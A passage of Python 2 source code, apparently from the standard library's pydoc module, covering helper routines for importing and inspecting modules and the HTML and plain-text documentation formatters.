def popleft(self):
return self.pop(0)
# --------------------------------------------------------- common routines
def pathdirs():
"""Convert sys.path into a list of absolute, existing, unique paths."""
dirs = []
normdirs = []
for dir in sys.path:
dir = os.path.abspath(dir or '.')
normdir = os.path.normcase(dir)
if normdir not in normdirs and os.path.isdir(dir):
dirs.append(dir)
normdirs.append(normdir)
return dirs
def getdoc(object):
"""Get the doc string or comments for an object."""
result = inspect.getdoc(object) or inspect.getcomments(object)
return result and re.sub('^ *\n', '', rstrip(result)) or ''
def splitdoc(doc):
"""Split a doc string into a synopsis line (if any) and the rest."""
lines = split(strip(doc), '\n')
if len(lines) == 1:
return lines[0], ''
elif len(lines) >= 2 and not rstrip(lines[1]):
return lines[0], join(lines[2:], '\n')
return '', join(lines, '\n')
def classname(object, modname):
"""Get a class name and qualify it with a module name if necessary."""
name = object.__name__
if object.__module__ != modname:
name = object.__module__ + '.' + name
return name
def isdata(object):
"""Check if an object is of a type that probably means it's data."""
return not (inspect.ismodule(object) or inspect.isclass(object) or
inspect.isroutine(object) or inspect.isframe(object) or
inspect.istraceback(object) or inspect.iscode(object))
def replace(text, *pairs):
"""Do a series of global replacements on a string."""
while pairs:
text = join(split(text, pairs[0]), pairs[1])
pairs = pairs[2:]
return text
def cram(text, maxlen):
"""Omit part of a string if needed to make it fit in a maximum length."""
if len(text) > maxlen:
pre = max(0, (maxlen-3)//2)
post = max(0, maxlen-3-pre)
return text[:pre] + '...' + text[len(text)-post:]
return text
_re_stripid = re.compile(r' at 0x[0-9a-f]{6,16}(>+)$', re.IGNORECASE)
def stripid(text):
"""Remove the hexadecimal id from a Python object representation."""
# The behaviour of %p is implementation-dependent in terms of case.
if _re_stripid.search(repr(Exception)):
return _re_stripid.sub(r'\1', text)
return text
def _is_some_method(obj):
return inspect.ismethod(obj) or inspect.ismethoddescriptor(obj)
def allmethods(cl):
methods = {}
for key, value in inspect.getmembers(cl, _is_some_method):
methods[key] = 1
for base in cl.__bases__:
methods.update(allmethods(base)) # all your base are belong to us
for key in methods.keys():
methods[key] = getattr(cl, key)
return methods
def _split_list(s, predicate):
"""Split sequence s via predicate, and return pair ([true], [false]).
The return value is a 2-tuple of lists,
([x for x in s if predicate(x)],
[x for x in s if not predicate(x)])
"""
yes = []
no = []
for x in s:
if predicate(x):
yes.append(x)
else:
no.append(x)
return yes, no
def visiblename(name, all=None):
"""Decide whether to show documentation on a variable."""
# Certain special names are redundant.
_hidden_names = ('__builtins__', '__doc__', '__file__', '__path__',
'__module__', '__name__', '__slots__', '__package__')
if name in _hidden_names: return 0
# Private names are hidden, but special names are displayed.
if name.startswith('__') and name.endswith('__'): return 1
if all is not None:
# only document that which the programmer exported in __all__
return name in all
else:
return not name.startswith('_')
def classify_class_attrs(object):
"""Wrap inspect.classify_class_attrs, with fixup for data descriptors."""
def fixup(data):
name, kind, cls, value = data
if inspect.isdatadescriptor(value):
kind = 'data descriptor'
return name, kind, cls, value
return map(fixup, inspect.classify_class_attrs(object))
# ----------------------------------------------------- module manipulation
def ispackage(path):
"""Guess whether a path refers to a package directory."""
if os.path.isdir(path):
for ext in ('.py', '.pyc', '.pyo'):
if os.path.isfile(os.path.join(path, '__init__' + ext)):
return True
return False
def source_synopsis(file):
line = file.readline()
while line[:1] == '#' or not strip(line):
line = file.readline()
if not line: break
line = strip(line)
if line[:4] == 'r"""': line = line[1:]
if line[:3] == '"""':
line = line[3:]
if line[-1:] == '\\': line = line[:-1]
while not strip(line):
line = file.readline()
if not line: break
result = strip(split(line, '"""')[0])
else: result = None
return result
def synopsis(filename, cache={}):
"""Get the one-line summary out of a module file."""
mtime = os.stat(filename).st_mtime
lastupdate, result = cache.get(filename, (0, None))
if lastupdate < mtime:
info = inspect.getmoduleinfo(filename)
try:
file = open(filename)
except IOError:
# module can't be opened, so skip it
return None
if info and 'b' in info[2]: # binary modules have to be imported
try: module = imp.load_module('__temp__', file, filename, info[1:])
except: return None
result = (module.__doc__ or '').splitlines()[0]
del sys.modules['__temp__']
else: # text modules can be directly examined
result = source_synopsis(file)
file.close()
cache[filename] = (mtime, result)
return result
class ErrorDuringImport(Exception):
"""Errors that occurred while trying to import something to document it."""
def __init__(self, filename, exc_info):
exc, value, tb = exc_info
self.filename = filename
self.exc = exc
self.value = value
self.tb = tb
def __str__(self):
exc = self.exc
if type(exc) is types.ClassType:
exc = exc.__name__
return 'problem in %s - %s: %s' % (self.filename, exc, self.value)
def importfile(path):
"""Import a Python source file or compiled file given its path."""
magic = imp.get_magic()
file = open(path, 'r')
if file.read(len(magic)) == magic:
kind = imp.PY_COMPILED
else:
kind = imp.PY_SOURCE
file.close()
filename = os.path.basename(path)
name, ext = os.path.splitext(filename)
file = open(path, 'r')
try:
module = imp.load_module(name, file, path, (ext, 'r', kind))
except:
raise ErrorDuringImport(path, sys.exc_info())
file.close()
return module
def safeimport(path, forceload=0, cache={}):
"""Import a module; handle errors; return None if the module isn't found.
If the module *is* found but an exception occurs, it's wrapped in an
ErrorDuringImport exception and reraised. Unlike __import__, if a
package path is specified, the module at the end of the path is returned,
not the package at the beginning. If the optional 'forceload' argument
is 1, we reload the module from disk (unless it's a dynamic extension)."""
try:
# If forceload is 1 and the module has been previously loaded from
# disk, we always have to reload the module. Checking the file's
# mtime isn't good enough (e.g. the module could contain a class
# that inherits from another module that has changed).
if forceload and path in sys.modules:
if path not in sys.builtin_module_names:
# Avoid simply calling reload() because it leaves names in
# the currently loaded module lying around if they're not
# defined in the new source file. Instead, remove the
# module from sys.modules and re-import. Also remove any
# submodules because they won't appear in the newly loaded
# module's namespace if they're already in sys.modules.
subs = [m for m in sys.modules if m.startswith(path + '.')]
for key in [path] + subs:
# Prevent garbage collection.
cache[key] = sys.modules[key]
del sys.modules[key]
module = __import__(path)
except:
# Did the error occur before or after the module was found?
(exc, value, tb) = info = sys.exc_info()
if path in sys.modules:
# An error occurred while executing the imported module.
raise ErrorDuringImport(sys.modules[path].__file__, info)
elif exc is SyntaxError:
# A SyntaxError occurred before we could execute the module.
raise ErrorDuringImport(value.filename, info)
elif exc is ImportError and extract_tb(tb)[-1][2]=='safeimport':
# The import error occurred directly in this function,
# which means there is no such module in the path.
return None
else:
# Some other error occurred during the importing process.
raise ErrorDuringImport(path, sys.exc_info())
for part in split(path, '.')[1:]:
try: module = getattr(module, part)
except AttributeError: return None
return module
# ---------------------------------------------------- formatter base class
class Doc:
def document(self, object, name=None, *args):
"""Generate documentation for an object."""
args = (object, name) + args
# 'try' clause is to attempt to handle the possibility that inspect
# identifies something in a way that pydoc itself has issues handling;
# think 'super' and how it is a descriptor (which raises the exception
# by lacking a __name__ attribute) and an instance.
if inspect.isgetsetdescriptor(object): return self.docdata(*args)
if inspect.ismemberdescriptor(object): return self.docdata(*args)
try:
if inspect.ismodule(object): return self.docmodule(*args)
if inspect.isclass(object): return self.docclass(*args)
if inspect.isroutine(object): return self.docroutine(*args)
except AttributeError:
pass
if isinstance(object, property): return self.docproperty(*args)
return self.docother(*args)
def fail(self, object, name=None, *args):
"""Raise an exception for unimplemented types."""
message = "don't know how to document object%s of type %s" % (
name and ' ' + repr(name), type(object).__name__)
raise TypeError, message
docmodule = docclass = docroutine = docother = docproperty = docdata = fail
def getdocloc(self, object):
"""Return the location of module docs or None"""
try:
file = inspect.getabsfile(object)
except TypeError:
file = '(built-in)'
docloc = os.environ.get("PYTHONDOCS",
"http://docs.python.org/library")
basedir = os.path.join(sys.exec_prefix, "lib",
"python"+sys.version[0:3])
if (isinstance(object, type(os)) and
(object.__name__ in ('errno', 'exceptions', 'gc', 'imp',
'marshal', 'posix', 'signal', 'sys',
'thread', 'zipimport') or
(file.startswith(basedir) and
not file.startswith(os.path.join(basedir, 'site-packages'))))):
if docloc.startswith("http://"):
docloc = "%s/%s" % (docloc.rstrip("/"), object.__name__)
else:
docloc = os.path.join(docloc, object.__name__ + ".html")
else:
docloc = None
return docloc
# -------------------------------------------- HTML documentation generator
class HTMLRepr(Repr):
"""Class for safely making an HTML representation of a Python object."""
def __init__(self):
Repr.__init__(self)
self.maxlist = self.maxtuple = 20
self.maxdict = 10
self.maxstring = self.maxother = 100
def escape(self, text):
return replace(text, '&', '&', '<', '<', '>', '>')
def repr(self, object):
return Repr.repr(self, object)
def repr1(self, x, level):
if hasattr(type(x), '__name__'):
methodname = 'repr_' + join(split(type(x).__name__), '_')
if hasattr(self, methodname):
return getattr(self, methodname)(x, level)
return self.escape(cram(stripid(repr(x)), self.maxother))
def repr_string(self, x, level):
test = cram(x, self.maxstring)
testrepr = repr(test)
if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
# Backslashes are only literal in the string and are never
# needed to make any special characters, so show a raw string.
return 'r' + testrepr[0] + self.escape(test) + testrepr[0]
return re.sub(r'((\\[\\abfnrtv\'"]|\\[0-9]..|\\x..|\\u....)+)',
r'<font color="#c040c0">\1</font>',
self.escape(testrepr))
repr_str = repr_string
def repr_instance(self, x, level):
try:
return self.escape(cram(stripid(repr(x)), self.maxstring))
except:
return self.escape('<%s instance>' % x.__class__.__name__)
repr_unicode = repr_string
class HTMLDoc(Doc):
"""Formatter class for HTML documentation."""
# ------------------------------------------- HTML formatting utilities
_repr_instance = HTMLRepr()
repr = _repr_instance.repr
escape = _repr_instance.escape
def page(self, title, contents):
"""Format an HTML page."""
return '''
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>Python: %s</title>
</head><body bgcolor="#f0f0f8">
%s
</body></html>''' % (title, contents)
def heading(self, title, fgcol, bgcol, extras=''):
"""Format a page heading."""
return '''
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="heading">
<tr bgcolor="%s">
<td valign=bottom> <br>
<font color="%s" face="helvetica, arial"> <br>%s</font></td
><td align=right valign=bottom
><font color="%s" face="helvetica, arial">%s</font></td></tr></table>
''' % (bgcol, fgcol, title, fgcol, extras or ' ')
def section(self, title, fgcol, bgcol, contents, width=6,
prelude='', marginalia=None, gap=' '):
"""Format a section with a heading."""
if marginalia is None:
marginalia = '<tt>' + ' ' * width + '</tt>'
result = '''<p>
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="section">
<tr bgcolor="%s">
<td colspan=3 valign=bottom> <br>
<font color="%s" face="helvetica, arial">%s</font></td></tr>
''' % (bgcol, fgcol, title)
if prelude:
result = result + '''
<tr bgcolor="%s"><td rowspan=2>%s</td>
<td colspan=2>%s</td></tr>
<tr><td>%s</td>''' % (bgcol, marginalia, prelude, gap)
else:
result = result + '''
<tr><td bgcolor="%s">%s</td><td>%s</td>''' % (bgcol, marginalia, gap)
return result + '\n<td width="100%%">%s</td></tr></table>' % contents
def bigsection(self, title, *args):
"""Format a section with a big heading."""
title = '<big><strong>%s</strong></big>' % title
return self.section(title, *args)
def preformat(self, text):
"""Format literal preformatted text."""
text = self.escape(expandtabs(text))
return replace(text, '\n\n', '\n \n', '\n\n', '\n \n',
' ', ' ', '\n', '<br>\n')
def multicolumn(self, list, format, cols=4):
"""Format a list of items into a multi-column list."""
result = ''
rows = (len(list)+cols-1)/cols
for col in range(cols):
result = result + '<td width="%d%%" valign=top>' % (100/cols)
for i in range(rows*col, rows*col+rows):
if i < len(list):
result = result + format(list[i]) + '<br>\n'
result = result + '</td>'
return '<table width="100%%" summary="list"><tr>%s</tr></table>' % result
def grey(self, text): return '<font color="#909090">%s</font>' % text
def namelink(self, name, *dicts):
"""Make a link for an identifier, given name-to-URL mappings."""
for dict in dicts:
if name in dict:
return '<a href="%s">%s</a>' % (dict[name], name)
return name
def classlink(self, object, modname):
"""Make a link for a class."""
name, module = object.__name__, sys.modules.get(object.__module__)
if hasattr(module, name) and getattr(module, name) is object:
return '<a href="%s.html#%s">%s</a>' % (
module.__name__, name, classname(object, modname))
return classname(object, modname)
def modulelink(self, object):
"""Make a link for a module."""
return '<a href="%s.html">%s</a>' % (object.__name__, object.__name__)
def modpkglink(self, data):
"""Make a link for a module or package to display in an index."""
name, path, ispackage, shadowed = data
if shadowed:
return self.grey(name)
if path:
url = '%s.%s.html' % (path, name)
else:
url = '%s.html' % name
if ispackage:
text = '<strong>%s</strong> (package)' % name
else:
text = name
return '<a href="%s">%s</a>' % (url, text)
def markup(self, text, escape=None, funcs={}, classes={}, methods={}):
"""Mark up some plain text, given a context of symbols to look for.
Each context dictionary maps object names to anchor names."""
escape = escape or self.escape
results = []
here = 0
pattern = re.compile(r'\b((http|ftp)://\S+[\w/]|'
r'RFC[- ]?(\d+)|'
r'PEP[- ]?(\d+)|'
r'(self\.)?(\w+))')
while True:
match = pattern.search(text, here)
if not match: break
start, end = match.span()
results.append(escape(text[here:start]))
all, scheme, rfc, pep, selfdot, name = match.groups()
if scheme:
url = escape(all).replace('"', '"')
results.append('<a href="%s">%s</a>' % (url, url))
elif rfc:
url = 'http://www.rfc-editor.org/rfc/rfc%d.txt' % int(rfc)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif pep:
url = 'http://www.python.org/dev/peps/pep-%04d/' % int(pep)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif text[end:end+1] == '(':
results.append(self.namelink(name, methods, funcs, classes))
elif selfdot:
results.append('self.<strong>%s</strong>' % name)
else:
results.append(self.namelink(name, classes))
here = end
results.append(escape(text[here:]))
return join(results, '')
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None):
"""Produce HTML for a class tree as given by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + '<dt><font face="helvetica, arial">'
result = result + self.classlink(c, modname)
if bases and bases != (parent,):
parents = []
for base in bases:
parents.append(self.classlink(base, modname))
result = result + '(' + join(parents, ', ') + ')'
result = result + '\n</font></dt>'
elif type(entry) is type([]):
result = result + '<dd>\n%s</dd>\n' % self.formattree(
entry, modname, c)
return '<dl>\n%s</dl>\n' % result
def docmodule(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a module object."""
name = object.__name__ # ignore the passed-in name
try:
all = object.__all__
except AttributeError:
all = None
parts = split(name, '.')
links = []
for i in range(len(parts)-1):
links.append(
'<a href="%s.html"><font color="#ffffff">%s</font></a>' %
(join(parts[:i+1], '.'), parts[i]))
linkedname = join(links + parts[-1:], '.')
head = '<big><big><strong>%s</strong></big></big>' % linkedname
try:
path = inspect.getabsfile(object)
url = path
if sys.platform == 'win32':
import nturl2path
url = nturl2path.pathname2url(path)
filelink = '<a href="file:%s">%s</a>' % (url, path)
except TypeError:
filelink = '(built-in)'
info = []
if hasattr(object, '__version__'):
version = str(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = strip(version[11:-1])
info.append('version %s' % self.escape(version))
if hasattr(object, '__date__'):
info.append(self.escape(str(object.__date__)))
if info:
head = head + ' (%s)' % join(info, ', ')
docloc = self.getdocloc(object)
if docloc is not None:
docloc = '<br><a href="%(docloc)s">Module Docs</a>' % locals()
else:
docloc = ''
result = self.heading(
head, '#ffffff', '#7799ee',
'<a href=".">index</a><br>' + filelink + docloc)
modules = inspect.getmembers(object, inspect.ismodule)
classes, cdict = [], {}
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
(inspect.getmodule(value) or object) is object):
if visiblename(key, all):
classes.append((key, value))
cdict[key] = cdict[value] = '#' + key
for key, value in classes:
for base in value.__bases__:
key, modname = base.__name__, base.__module__
module = sys.modules.get(modname)
if modname != name and module and hasattr(module, key):
if getattr(module, key) is base:
if not key in cdict:
cdict[key] = cdict[base] = modname + '.html#' + key
funcs, fdict = [], {}
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if visiblename(key, all):
funcs.append((key, value))
fdict[key] = '#-' + key
if inspect.isfunction(value): fdict[value] = fdict[key]
data = []
for key, value in inspect.getmembers(object, isdata):
if visiblename(key, all):
data.append((key, value))
doc = self.markup(getdoc(object), self.preformat, fdict, cdict)
doc = doc and '<tt>%s</tt>' % doc
result = result + '<p>%s</p>\n' % doc
if hasattr(object, '__path__'):
modpkgs = []
for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
modpkgs.append((modname, name, ispkg, 0))
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
result = result + self.bigsection(
'Package Contents', '#ffffff', '#aa55cc', contents)
elif modules:
contents = self.multicolumn(
modules, lambda key_value, s=self: s.modulelink(key_value[1]))
result = result + self.bigsection(
'Modules', '#ffffff', '#aa55cc', contents)
if classes:
classlist = map(lambda key_value: key_value[1], classes)
contents = [
self.formattree(inspect.getclasstree(classlist, 1), name)]
for key, value in classes:
contents.append(self.document(value, key, name, fdict, cdict))
result = result + self.bigsection(
'Classes', '#ffffff', '#ee77aa', join(contents))
if funcs:
contents = []
for key, value in funcs:
contents.append(self.document(value, key, name, fdict, cdict))
result = result + self.bigsection(
'Functions', '#ffffff', '#eeaa77', join(contents))
if data:
contents = []
for key, value in data:
contents.append(self.document(value, key))
result = result + self.bigsection(
'Data', '#ffffff', '#55aa55', join(contents, '<br>\n'))
if hasattr(object, '__author__'):
contents = self.markup(str(object.__author__), self.preformat)
result = result + self.bigsection(
'Author', '#ffffff', '#7799ee', contents)
if hasattr(object, '__credits__'):
contents = self.markup(str(object.__credits__), self.preformat)
result = result + self.bigsection(
'Credits', '#ffffff', '#7799ee', contents)
return result
def docclass(self, object, name=None, mod=None, funcs={}, classes={},
*ignored):
"""Produce HTML documentation for a class object."""
realname = object.__name__
name = name or realname
bases = object.__bases__
contents = []
push = contents.append
# Cute little class to pump out a horizontal rule between sections.
class HorizontalRule:
def __init__(self):
self.needone = 0
def maybe(self):
if self.needone:
push('<hr>\n')
self.needone = 1
hr = HorizontalRule()
# List the mro, if non-trivial.
mro = deque(inspect.getmro(object))
if len(mro) > 2:
hr.maybe()
push('<dl><dt>Method resolution order:</dt>\n')
for base in mro:
push('<dd>%s</dd>\n' % self.classlink(base,
object.__module__))
push('</dl>\n')
def spill(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self.document(getattr(object, name), name, mod,
funcs, classes, mdict, object))
push('\n')
return attrs
def spilldescriptors(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self._docdescriptor(name, value, mod))
return attrs
def spilldata(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
base = self.docother(getattr(object, name), name, mod)
if (hasattr(value, '__call__') or
inspect.isdatadescriptor(value)):
doc = getattr(value, "__doc__", None)
else:
doc = None
if doc is None:
push('<dl><dt>%s</dl>\n' % base)
else:
doc = self.markup(getdoc(value), self.preformat,
funcs, classes, mdict)
doc = '<dd><tt>%s</tt>' % doc
push('<dl><dt>%s%s</dl>\n' % (base, doc))
push('\n')
return attrs
attrs = filter(lambda data: visiblename(data[0]),
classify_class_attrs(object))
mdict = {}
for key, kind, homecls, value in attrs:
mdict[key] = anchor = '#' + name + '-' + key
value = getattr(object, key)
try:
# The value may not be hashable (e.g., a data attr with
# a dict or list value).
mdict[value] = anchor
except TypeError:
pass
while attrs:
if mro:
thisclass = mro.popleft()
else:
thisclass = attrs[0][2]
attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
if thisclass is __builtin__.object:
attrs = inherited
continue
elif thisclass is object:
tag = 'defined here'
else:
tag = 'inherited from %s' % self.classlink(thisclass,
object.__module__)
tag += ':<br>\n'
# Sort attrs by name.
try:
attrs.sort(key=lambda t: t[0])
except TypeError:
attrs.sort(lambda t1, t2: cmp(t1[0], t2[0])) # 2.3 compat
# Pump out the attrs, segregated by kind.
attrs = spill('Methods %s' % tag, attrs,
lambda t: t[1] == 'method')
attrs = spill('Class methods %s' % tag, attrs,
lambda t: t[1] == 'class method')
attrs = spill('Static methods %s' % tag, attrs,
lambda t: t[1] == 'static method')
attrs = spilldescriptors('Data descriptors %s' % tag, attrs,
lambda t: t[1] == 'data descriptor')
attrs = spilldata('Data and other attributes %s' % tag, attrs,
lambda t: t[1] == 'data')
assert attrs == []
attrs = inherited
contents = ''.join(contents)
if name == realname:
title = '<a name="%s">class <strong>%s</strong></a>' % (
name, realname)
else:
title = '<strong>%s</strong> = <a name="%s">class %s</a>' % (
name, name, realname)
if bases:
parents = []
for base in bases:
parents.append(self.classlink(base, object.__module__))
title = title + '(%s)' % join(parents, ', ')
doc = self.markup(getdoc(object), self.preformat, funcs, classes, mdict)
doc = doc and '<tt>%s<br> </tt>' % doc
return self.section(title, '#000000', '#ffc8d8', contents, 3, doc)
def formatvalue(self, object):
"""Format an argument default value as text."""
return self.grey('=' + self.repr(object))
def docroutine(self, object, name=None, mod=None,
funcs={}, classes={}, methods={}, cl=None):
"""Produce HTML documentation for a function or method object."""
realname = object.__name__
name = name or realname
anchor = (cl and cl.__name__ or '') + '-' + name
note = ''
skipdocs = 0
if inspect.ismethod(object):
imclass = object.im_class
if cl:
if imclass is not cl:
note = ' from ' + self.classlink(imclass, mod)
else:
if object.im_self is not None:
note = ' method of %s instance' % self.classlink(
object.im_self.__class__, mod)
else:
note = ' unbound %s method' % self.classlink(imclass,mod)
object = object.im_func
if name == realname:
title = '<a name="%s"><strong>%s</strong></a>' % (anchor, realname)
else:
if (cl and realname in cl.__dict__ and
cl.__dict__[realname] is object):
reallink = '<a href="#%s">%s</a>' % (
cl.__name__ + '-' + realname, realname)
skipdocs = 1
else:
reallink = realname
title = '<a name="%s"><strong>%s</strong></a> = %s' % (
anchor, name, reallink)
if inspect.isfunction(object):
args, varargs, varkw, defaults = inspect.getargspec(object)
argspec = inspect.formatargspec(
args, varargs, varkw, defaults, formatvalue=self.formatvalue)
if realname == '<lambda>':
title = '<strong>%s</strong> <em>lambda</em> ' % name
argspec = argspec[1:-1] # remove parentheses
else:
argspec = '(...)'
decl = title + argspec + (note and self.grey(
'<font face="helvetica, arial">%s</font>' % note))
if skipdocs:
return '<dl><dt>%s</dt></dl>\n' % decl
else:
doc = self.markup(
getdoc(object), self.preformat, funcs, classes, methods)
doc = doc and '<dd><tt>%s</tt></dd>' % doc
return '<dl><dt>%s</dt>%s</dl>\n' % (decl, doc)
def _docdescriptor(self, name, value, mod):
results = []
push = results.append
if name:
push('<dl><dt><strong>%s</strong></dt>\n' % name)
if value.__doc__ is not None:
doc = self.markup(getdoc(value), self.preformat)
push('<dd><tt>%s</tt></dd>\n' % doc)
push('</dl>\n')
return ''.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce html documentation for a property."""
return self._docdescriptor(name, object, mod)
def docother(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a data object."""
lhs = name and '<strong>%s</strong> = ' % name or ''
return lhs + self.repr(object)
def docdata(self, object, name=None, mod=None, cl=None):
"""Produce html documentation for a data descriptor."""
return self._docdescriptor(name, object, mod)
def index(self, dir, shadowed=None):
"""Generate an HTML index for a directory of modules."""
modpkgs = []
if shadowed is None: shadowed = {}
for importer, name, ispkg in pkgutil.iter_modules([dir]):
modpkgs.append((name, '', ispkg, name in shadowed))
shadowed[name] = 1
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
return self.bigsection(dir, '#ffffff', '#ee77aa', contents)
# -------------------------------------------- text documentation generator
class TextRepr(Repr):
"""Class for safely making a text representation of a Python object."""
def __init__(self):
Repr.__init__(self)
self.maxlist = self.maxtuple = 20
self.maxdict = 10
self.maxstring = self.maxother = 100
def repr1(self, x, level):
if hasattr(type(x), '__name__'):
methodname = 'repr_' + join(split(type(x).__name__), '_')
if hasattr(self, methodname):
return getattr(self, methodname)(x, level)
return cram(stripid(repr(x)), self.maxother)
def repr_string(self, x, level):
test = cram(x, self.maxstring)
testrepr = repr(test)
if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
# Backslashes are only literal in the string and are never
# needed to make any special characters, so show a raw string.
return 'r' + testrepr[0] + test + testrepr[0]
return testrepr
repr_str = repr_string
def repr_instance(self, x, level):
try:
return cram(stripid(repr(x)), self.maxstring)
except:
return '<%s instance>' % x.__class__.__name__
class TextDoc(Doc):
"""Formatter class for text documentation."""
# ------------------------------------------- text formatting utilities
_repr_instance = TextRepr()
repr = _repr_instance.repr
def bold(self, text):
"""Format a string in bold by overstriking."""
return join(map(lambda ch: ch + '\b' + ch, text), '')
def indent(self, text, prefix=' '):
"""Indent text by prepending a given prefix to each line."""
if not text: return ''
lines = split(text, '\n')
lines = map(lambda line, prefix=prefix: prefix + line, lines)
if lines: lines[-1] = rstrip(lines[-1])
return join(lines, '\n')
def section(self, title, contents):
"""Format a section with a given heading."""
return self.bold(title) + '\n' + rstrip(self.indent(contents)) + '\n\n'
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None, prefix=''):
"""Render in text a class tree as returned by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + prefix + classname(c, modname)
if bases and bases != (parent,):
parents = map(lambda c, m=modname: classname(c, m), bases)
result = result + '(%s)' % join(parents, ', ')
result = result + '\n'
elif type(entry) is type([]):
result = result + self.formattree(
entry, modname, c, prefix + ' ')
return result
def docmodule(self, object, name=None, mod=None):
"""Produce text documentation for a given module object."""
name = object.__name__ # ignore the passed-in name
synop, desc = splitdoc(getdoc(object))
result = self.section('NAME', name + (synop and ' - ' + synop))
try:
all = object.__all__
except AttributeError:
all = None
try:
file = inspect.getabsfile(object)
except TypeError:
file = '(built-in)'
result = result + self.section('FILE', file)
docloc = self.getdocloc(object)
if docloc is not None:
result = result + self.section('MODULE DOCS', docloc)
if desc:
result = result + self.section('DESCRIPTION', desc)
classes = []
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None
or (inspect.getmodule(value) or object) is object):
if visiblename(key, all):
classes.append((key, value))
funcs = []
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if visiblename(key, all):
funcs.append((key, value))
data = []
for key, value in inspect.getmembers(object, isdata):
if visiblename(key, all):
data.append((key, value))
modpkgs = []
modpkgs_names = set()
if hasattr(object, '__path__'):
for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
modpkgs_names.add(modname)
if ispkg:
modpkgs.append(modname + ' (package)')
else:
modpkgs.append(modname)
modpkgs.sort()
result = result + self.section(
'PACKAGE CONTENTS', join(modpkgs, '\n'))
# Detect submodules as sometimes created by C extensions
submodules = []
for key, value in inspect.getmembers(object, inspect.ismodule):
if value.__name__.startswith(name + '.') and key not in modpkgs_names:
submodules.append(key)
if submodules:
submodules.sort()
result = result + self.section(
'SUBMODULES', join(submodules, '\n'))
if classes:
classlist = map(lambda key_value: key_value[1], classes)
contents = [self.formattree(
inspect.getclasstree(classlist, 1), name)]
for key, value in classes:
contents.append(self.document(value, key, name))
result = result + self.section('CLASSES', join(contents, '\n'))
if funcs:
contents = []
for key, value in funcs:
contents.append(self.document(value, key, name))
result = result + self.section('FUNCTIONS', join(contents, '\n'))
if data:
contents = []
for key, value in data:
contents.append(self.docother(value, key, name, maxlen=70))
result = result + self.section('DATA', join(contents, '\n'))
if hasattr(object, '__version__'):
version = str(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = strip(version[11:-1])
result = result + self.section('VERSION', version)
if hasattr(object, '__date__'):
result = result + self.section('DATE', str(object.__date__))
if hasattr(object, '__author__'):
result = result + self.section('AUTHOR', str(object.__author__))
if hasattr(object, '__credits__'):
result = result + self.section('CREDITS', str(object.__credits__))
return result
def docclass(self, object, name=None, mod=None):
"""Produce text documentation for a given class object."""
realname = object.__name__
name = name or realname
bases = object.__bases__
def makename(c, m=object.__module__):
return classname(c, m)
if name == realname:
title = 'class ' + self.bold(realname)
else:
title = self.bold(name) + ' = class ' + realname
if bases:
parents = map(makename, bases)
title = title + '(%s)' % join(parents, ', ')
doc = getdoc(object)
contents = doc and [doc + '\n'] or []
push = contents.append
# List the mro, if non-trivial.
mro = deque(inspect.getmro(object))
if len(mro) > 2:
push("Method resolution order:")
for base in mro:
push(' ' + makename(base))
push('')
# Cute little class to pump out a horizontal rule between sections.
class HorizontalRule:
def __init__(self):
self.needone = 0
def maybe(self):
if self.needone:
push('-' * 70)
self.needone = 1
hr = HorizontalRule()
def spill(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self.document(getattr(object, name),
name, mod, object))
return attrs
def spilldescriptors(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self._docdescriptor(name, value, mod))
return attrs
def spilldata(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
if (hasattr(value, '__call__') or
inspect.isdatadescriptor(value)):
doc = getdoc(value)
else:
doc = None
push(self.docother(getattr(object, name),
name, mod, maxlen=70, doc=doc) + '\n')
return attrs
attrs = filter(lambda data: visiblename(data[0]),
classify_class_attrs(object))
while attrs:
if mro:
thisclass = mro.popleft()
else:
thisclass = attrs[0][2]
attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
if thisclass is __builtin__.object:
attrs = inherited
continue
elif thisclass is object:
tag = "defined here"
else:
tag = "inherited from %s" % classname(thisclass,
object.__module__)
# Sort attrs by name.
attrs.sort()
